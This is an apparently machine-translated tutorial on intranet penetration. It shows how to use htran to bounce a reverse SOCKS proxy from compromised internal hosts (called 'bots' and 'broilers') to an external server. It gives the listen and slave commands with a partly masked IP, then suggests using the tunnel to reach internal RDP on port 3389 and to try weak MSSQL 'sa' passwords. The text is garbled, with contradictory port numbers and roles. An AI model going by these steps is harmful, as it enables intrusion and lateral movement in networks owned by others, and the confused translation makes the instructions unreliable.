Use of htran and socks4-Intranet penetration

Use of htran and socks4-Intranet penetration

In Intranet penetration, it is necessary to rebound the socks proxy. We all know that lcx is used to forward ports. It seems that few people directly connect to the proxy. Because we want to connect to its machine on the Intranet, it is impossible for us to connect to the transit port one by one. There is no way to enable proxy on the machine currently controlled, because the other party is on the Intranet. So we use the bounce proxy method. In fact, everyone understands this method. Schematic diagram: Execute the command htran.exe-p-listen 9001 on the external network server to listen to two ports, 9000 to receive Intranet machines, and 9001 to connect the data Waiting for Client on port of sockscap: the Dig-p-slave 222.242.XXX.X 9001 127.0.0.1 8009 command means to connect to the internet server, and then forward data to the Intranet server. Port 8009 is the Server IP address, and port 9001 is the server listening port, 127.0.0.1 local IP address 8009 the port on the local machine that rebounded out is the final result of the Intranet machine 8009-> Internet machine 9001-> Local scokscap using port 9000 to connect to the Internet machine above OK, next, install sockscap on your local machine, connect to port 9000 on the internet server, and then set Sockscap on the console. In the "file"-"Settings", the console can put the program you want to proxy on, drag it in directly, the console machine program can be connected to the machine connected to the Intranet. For example, if you directly use mstsc to connect to 3389 of other machines in the Intranet, you can try the password or log on to the management, or use mssql to connect to 1433 of the Intranet and try the sa weak port. In short, socks bounce is a bridge between the Intranet machines you have controlled and other machines on the Intranet. The following describes how to use htran.exe-p-listen 33891 to run htran.exe-p-listen 3389 on 8000 bots connected to the Intranet: htran-p-slave: bot ip address 3389 127.0.0.1 8000 with 33893 permissions, directly open the 3389 connection on your machine, and fill in the bot IP address with 3389 permissions: 8001 use II. Use socks proxy 1. Run htran.exe-p-listen 3389 8000 and htran-p-slave public network zombie IP address 80012 127.0.0.1 8000 on Broilers with 8009 permissions (note: the default value of the program must be 8009. If you modify the value, you need to check the command again. Otherwise, the socks proxy will not be able to use it) 3. Next, use socketscap to connect to port 8001 of the Internet broiler, and then use the ip address of the Internet broiler.
Surfing the Internet :)